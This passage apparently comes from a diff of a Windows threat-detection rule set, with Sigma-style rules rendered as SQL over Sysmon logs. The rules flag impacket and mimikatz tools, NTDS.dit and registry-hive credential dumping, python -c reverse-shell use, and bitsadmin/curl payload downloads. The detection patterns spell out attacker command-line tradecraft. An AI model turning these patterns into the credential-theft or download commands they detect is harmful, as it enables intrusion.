"proc_creation_win_powershell_amsi_init_failed_bypass.yml" + "filename": "proc_creation_win_print_remote_file_copy.yml" }, { - "title": "Fsutil Behavior Set SymlinkEvaluation", - "id": "c0b2768a-dd06-4671-8339-b16ca8d1f27f", + "title": "Python Inline Command Execution", + "id": "899133d5-4d7c-4a7f-94ee-27355c879d90", "status": "experimental", - "description": "A symbolic link is a type of file that contains a reference to another file.\nThis is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt\n", - "author": "frack113", + "description": "Detects execution of python using the \"-c\" flag. This is could be used as a way to launch a reverse shell or execute live python code.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", "attack.t1059" ], "falsepositives": [ - "Legitimate use" + "Python libraries that use a flag starting with \"-c\". Filter according to your environment" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR OriginalFileName = 'fsutil.exe') AND (CommandLine LIKE '%behavior %' ESCAPE '\\' AND CommandLine LIKE '%set %' ESCAPE '\\' AND CommandLine LIKE '%SymlinkEvaluation%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((OriginalFileName = 'python.exe' OR (Image LIKE '%python.exe' ESCAPE '\\' OR Image LIKE '%python3.exe' ESCAPE '\\' OR Image LIKE '%python2.exe' ESCAPE '\\')) AND CommandLine LIKE '% -c%' ESCAPE '\\') AND NOT ((ParentImage LIKE 'C:\\\\Program Files\\\\Python%' ESCAPE '\\' AND ParentImage LIKE '%\\\\python.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-E -s -m ensurepip -U --default-pip%' ESCAPE '\\') OR (ParentImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\')))" ], - "filename": 
"proc_creation_win_fsutil_symlinkevaluation.yml" + "filename": "proc_creation_win_python_inline_command_execution.yml" }, { - "title": "HackTool - Impacket Tools Execution", - "id": "4627c6ae-6899-46e2-aa0c-6ebcb1becd19", - "status": "test", - "description": "Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)", - "author": "Florian Roth (Nextron Systems)", + "title": "PUA - Crassus Execution", + "id": "2c32b543-1058-4808-91c6-5b31b8bed6c5", + "status": "experimental", + "description": "Detects Crassus a windows privilege escalation discovery tool based on PE metadata characteristics.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1557.001" + "attack.discovery", + "attack.t1590.001" ], "falsepositives": [ - "Legitimate use of the impacket tools" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\goldenPac%' ESCAPE '\\' OR Image LIKE '%\\\\karmaSMB%' ESCAPE '\\' OR Image LIKE '%\\\\kintercept%' ESCAPE '\\' OR Image LIKE '%\\\\ntlmrelayx%' ESCAPE '\\' OR Image LIKE '%\\\\rpcdump%' ESCAPE '\\' OR Image LIKE '%\\\\samrdump%' ESCAPE '\\' OR Image LIKE '%\\\\secretsdump%' ESCAPE '\\' OR Image LIKE '%\\\\smbexec%' ESCAPE '\\' OR Image LIKE '%\\\\smbrelayx%' ESCAPE '\\' OR Image LIKE '%\\\\wmiexec%' ESCAPE '\\' OR Image LIKE '%\\\\wmipersist%' ESCAPE '\\') OR (Image LIKE '%\\\\atexec\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\dcomexec\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\dpapi\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\findDelegation\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\GetADUsers\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\GetNPUsers\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\getPac\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\getST\\_windows.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\getTGT\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\GetUserSPNs\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\ifmap\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\mimikatz\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\netview\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\nmapAnswerMachine\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\opdump\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\psexec\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\rdp\\_check\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\sambaPipe\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\smbclient\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\smbserver\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\sniffer\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\sniff\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\split\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\ticketer\\_windows.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Crassus.exe' ESCAPE '\\' OR OriginalFileName = 'Crassus.exe' OR Description LIKE '%Crassus%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_impacket_tools.yml" + "filename": "proc_creation_win_pua_crassus.yml" }, { - "title": "Suspicious Extexport Execution", - "id": "fb0b815b-f5f6-4f50-970f-ffe21f253f7a", + "title": "Sensitive Registry Access via Volume Shadow Copy", + "id": "f57f8d16-1f39-4dcb-a604-6c73d9b54b3d", "status": "experimental", - "description": "Extexport.exe loads dll and is execute from other folder the original path", - "author": "frack113", - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "falsepositives": [ - "Unknown" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%Extexport.exe%' ESCAPE '\\' OR Image LIKE '%\\\\Extexport.exe' ESCAPE '\\' OR OriginalFileName = 'extexport.exe'))" - ], - "filename": 
"proc_creation_win_lolbin_extexport.yml" - }, - { - "title": "Interactive AT Job", - "id": "60fc936d-2eb0-4543-8a13-911c750a1dfc", - "status": "test", - "description": "Detects an interactive AT job, which may be used as a form of privilege escalation.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "description": "Detects a command that accesses password storing registry hives via volume shadow backups", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1053.002" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unlikely (at.exe deprecated as of Windows 8)" + "Some rare backup scenarios" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\at.exe' ESCAPE '\\' AND CommandLine LIKE '%interactive%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\NTDS.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SECURITY%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\tmp\\\\log%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_at_interactive_execution.yml" + "filename": "proc_creation_win_malware_conti_shadowcopy.yml" }, { - "title": "HackTool - Pypykatz Credentials Dumping Activity", - "id": "a29808fd-ef50-49ff-9c7a-59a9b040b404", - "status": "test", - "description": "Detects the usage of \"pypykatz\" to obtain stored credentials. 
Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored", - "author": "frack113", + "title": "Rundll32 With Suspicious Parent Process", + "id": "1723e720-616d-4ddc-ab02-f7e3685a4713", + "status": "experimental", + "description": "Detects suspicious start of rundll32.exe with a parent process of Explorer.exe. Variant of Raspberry Robin, as first reported by Red Canary.", + "author": "CD_ROM_", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\pypykatz.exe' ESCAPE '\\' OR Image LIKE '%\\\\python.exe' ESCAPE '\\') AND CommandLine LIKE '%live%' ESCAPE '\\' AND CommandLine LIKE '%registry%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ParentImage LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '% C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '% -localserver 22d8c27b-47a1-48d1-ad08-7da7abd79617' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_pypykatz.yml" + "filename": "proc_creation_win_rundll32_parent_explorer.yml" }, { - "title": "Root Certificate Installed From Susp Locations", - "id": "5f6a601c-2ecb-498b-9c33-660362323afa", + "title": "Potential CVE-2022-29072 Exploitation Attempt", + "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ee3", "status": "experimental", - "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential exploitation attempts of 
CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability.\n7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow.\nThe command runs in a child process under the 7zFM.exe process.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1553.004" + "attack.execution", + "cve.2022.29072" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Import-Certificate%' ESCAPE '\\' AND CommandLine LIKE '% -FilePath %' ESCAPE '\\' AND CommandLine LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND ParentImage LIKE '%\\\\7zFM.exe' ESCAPE '\\') AND NOT (((CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% /k %' ESCAPE '\\' OR CommandLine LIKE '% /r %' ESCAPE '\\')) OR (CommandLine = '')))" ], - "filename": "proc_creation_win_powershell_import_cert_susp_locations.yml" + "filename": "proc_creation_win_exploit_cve_2022_29072_7zip.yml" }, { - "title": "Suspicious WERMGR Process Patterns", - "id": "396f6630-f3ac-44e3-bfc8-1b161bc00c4e", + "title": "PUA - AdvancedRun Suspicious Execution", + "id": "fa00b701-44c6-4679-994d-5a18afa8a707", "status": "experimental", - "description": 
"Detects suspicious Windows Error Reporting manager (wermgr.exe) process patterns - suspicious parents / children, execution folders, command lines etc.", + "description": "Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts", "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND (Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%/EXEFilename%' ESCAPE '\\' OR CommandLine LIKE '%/CommandLine%' ESCAPE '\\') AND ((CommandLine LIKE '% /RunAs 8 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 4 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 10 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 11 %' ESCAPE '\\') OR (CommandLine LIKE '%/RunAs 8' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 4' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 10' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 11' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wermgr_susp_child_process.yml" + "filename": "proc_creation_win_pua_advancedrun_priv_user.yml" }, { - "title": "Suspicious RunAs-Like Flag Combination", - "id": 
"50d66fb0-03f8-4da0-8add-84e77d12a020", + "title": "File Download Via Bitsadmin To An Uncommon Target Folder", + "id": "6e30c82f-a9f8-4aab-b79c-7c12bce6f248", "status": "experimental", - "description": "Detects suspicious command line flags that let the user set a target user and command as e.g. seen in PsExec-like tools", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of bitsadmin downloading a file to uncommon target folder", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -u system %' ESCAPE '\\' OR CommandLine LIKE '% --user system %' ESCAPE '\\' OR CommandLine LIKE '% -u NT%' ESCAPE '\\' OR CommandLine LIKE '% -u \"NT%' ESCAPE '\\' OR CommandLine LIKE '% -u ''NT%' ESCAPE '\\' OR CommandLine LIKE '% --system %' ESCAPE '\\' OR CommandLine LIKE '% -u administrator %' ESCAPE '\\') AND (CommandLine LIKE '% -c cmd%' ESCAPE '\\' OR CommandLine LIKE '% -c \"cmd%' ESCAPE '\\' OR CommandLine LIKE '% -c powershell%' ESCAPE '\\' OR CommandLine LIKE '% -c \"powershell%' ESCAPE '\\' OR CommandLine LIKE '% --command cmd%' ESCAPE '\\' OR CommandLine LIKE '% --command powershell%' ESCAPE '\\' OR CommandLine LIKE '% -c whoami%' ESCAPE '\\' OR CommandLine LIKE '% -c wscript%' ESCAPE '\\' OR CommandLine LIKE '% -c cscript%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine 
LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_privilege_escalation_cli_patterns.yml" + "filename": "proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml" }, { - "title": "Potential Product Class Reconnaissance Via Wmic.EXE", - "id": "e568650b-5dcd-4658-8f34-ded0b1e13992", - "status": "experimental", - "description": "Detects the execution of WMIC in order to get a list of firewall and antivirus products", - "author": "Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community", + "title": "TAIDOOR RAT DLL Load", + "id": "d1aa3382-abab-446f-96ea-4de52908210b", + "status": "test", + "description": "Detects specific process characteristics of Chinese TAIDOOR RAT malware load", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1047", - "car.2016-03-002" + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%AntiVirusProduct%' ESCAPE '\\' OR CommandLine LIKE '%FirewallProduct%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%dll,MyStart%' ESCAPE '\\' OR CommandLine LIKE '%dll MyStart%' ESCAPE '\\') OR (CommandLine LIKE '% MyStart' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_recon_product_class.yml" + "filename": "proc_creation_win_apt_taidoor.yml" }, { - "title": "Password Protected Compressed File Extraction Via 7Zip", - "id": "b717b8fd-6467-4d7d-b3d3-27f9a463af77", - 
"status": "experimental", - "description": "Detects usage of 7zip utilities (7z.exe, 7za.exe and 7zr.exe) to extract password protected zip files.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Remote Access Tool - ScreenConnect Suspicious Execution", + "id": "75bfe6e6-cd8e-429e-91d3-03921e1d7962", + "status": "test", + "description": "Detects ScreenConnect program starts that establish a remote access to that system (not meeting, not remote support)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ - "Legitimate activity is expected since extracting files with a password can be common in some environement." + "Legitimate use by administrative staff" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (Image LIKE '%\\\\7z.exe' ESCAPE '\\' OR Image LIKE '%\\\\7zr.exe' ESCAPE '\\' OR Image LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND (CommandLine LIKE '% -p%' ESCAPE '\\' AND CommandLine LIKE '% x %' ESCAPE '\\' AND CommandLine LIKE '% -o%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%e=Access&%' ESCAPE '\\' AND CommandLine LIKE '%y=Guest&%' ESCAPE '\\' AND CommandLine LIKE '%&p=%' ESCAPE '\\' AND CommandLine LIKE '%&c=%' ESCAPE '\\' AND CommandLine LIKE '%&k=%' ESCAPE '\\')" ], - "filename": "proc_creation_win_7zip_password_extraction.yml" + "filename": "proc_creation_win_remote_access_tools_screenconnect_access.yml" }, { - "title": "Monitoring Winget For LOLbin Execution", - "id": "313d6012-51a0-4d93-8dfc-de8553239e25", - "status": "experimental", - "description": "Detects usage of winget to install applications via manifest file. 
Adversaries can abuse winget to download payloads remotely and execute them without touching disk. The manifest option enables you to install an application by passing in a YAML file directly to the client. Winget can be used to download and install exe's, msi, msix files later.", - "author": "Sreeman, Florian Roth (Nextron Systems), Frack113", + "title": "Invoke-Obfuscation STDIN+ Launcher", + "id": "6c96fc76-0eb1-11eb-adc1-0242ac120002", + "status": "test", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1059" - ], - "falsepositives": [ - "Admin activity installing packages not in the official Microsoft repo. Winget probably won't be used by most users." - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\winget.exe' ESCAPE '\\' OR OriginalFileName = 'winget.exe') AND CommandLine LIKE '%install%' ESCAPE '\\' AND (CommandLine LIKE '%-m %' ESCAPE '\\' OR CommandLine LIKE '%--manifest%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_lolbin_execution_via_winget.yml" - }, - { - "title": "Enumeration for Credentials in Registry", - "id": "e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1", - "status": "test", - "description": "Adversaries may search the Registry on compromised systems for insecurely stored credentials.\nThe Windows Registry stores configuration information that can be used by the system or other programs.\nAdversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services\n", - "author": "frack113", - "tags": [ - "attack.credential_access", - "attack.t1552.002" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '% query %' ESCAPE '\\' AND CommandLine LIKE '%/t %' ESCAPE '\\' AND CommandLine LIKE '%REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/s%' ESCAPE '\\') AND ((CommandLine LIKE '%/f %' ESCAPE '\\' AND CommandLine LIKE '%HKLM%' ESCAPE '\\') OR (CommandLine LIKE '%/f %' ESCAPE '\\' AND CommandLine LIKE '%HKCU%' ESCAPE '\\') OR CommandLine LIKE '%HKCU\\\\Software\\\\SimonTatham\\\\PuTTY\\\\Sessions%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (CommandLine LIKE '%noexit%' ESCAPE '\\' OR (CommandLine LIKE '%input%' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_reg_enumeration_for_credentials_in_registry.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_stdin.yml" }, { - "title": "Suspicious Curl.EXE Download", - "id": "e218595b-bbe7-4ee5-8a96-f32a24ad3468", + "title": "Suspicious Process Patterns NTDS.DIT Exfil", + "id": "8bc64091-6875-4881-aaf9-7bd25b5dda08", "status": "experimental", - "description": "Detects a suspicious curl process start on Windows and outputs the requested document to a local file", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious process patterns used in NTDS.DIT exfiltration", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND 
((CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.dll' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\' OR CommandLine LIKE '%.vbe' ESCAPE '\\' OR CommandLine LIKE '%.vbs' ESCAPE '\\'))) AND NOT ((ParentImage LIKE 'C:\\\\Program Files\\\\Git\\\\usr\\\\bin\\\\sh.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Program Files\\\\Git\\\\mingw64\\\\bin\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--silent --show-error --output %' ESCAPE '\\' AND CommandLine LIKE '%gfw-httpget-%' ESCAPE '\\' AND CommandLine LIKE '%AppData%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\NTDSDump.exe' ESCAPE '\\' OR Image LIKE '%\\\\NTDSDumpEx.exe' ESCAPE '\\') OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND CommandLine LIKE '%system.hiv%' ESCAPE '\\') OR CommandLine LIKE '%NTDSgrab.ps1%' ESCAPE '\\') OR (CommandLine LIKE '%ac i ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%/c copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\') OR (CommandLine LIKE '%activate instance ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') 
OR (CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%ntds.dit%' ESCAPE '\\')) OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND ((ParentImage LIKE '%\\\\apache%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\apache%' ESCAPE '\\' OR Image LIKE '%\\\\tomcat%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_curl_susp_download.yml" + "filename": "proc_creation_win_susp_ntds.yml" }, { - "title": "Pubprn.vbs Proxy Execution", - "id": "1fb76ab8-fa60-4b01-bddd-71e89bf555da", + "title": "Suspicious Group And Account Reconnaissance Activity Using Net.EXE", + "id": "d95de845-b83c-4a9a-8a6a-4fc802ebf6c0", "status": "experimental", - "description": "Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands.", - "author": "frack113", + "description": "Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE", + "author": "Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1216.001" + "attack.discovery", + "attack.t1087.001", + "attack.t1087.002" ], "falsepositives": [ - "Unknown" + "Inventory tool runs", + "Administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\pubprn.vbs%' ESCAPE '\\' AND CommandLine LIKE '%script:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR 
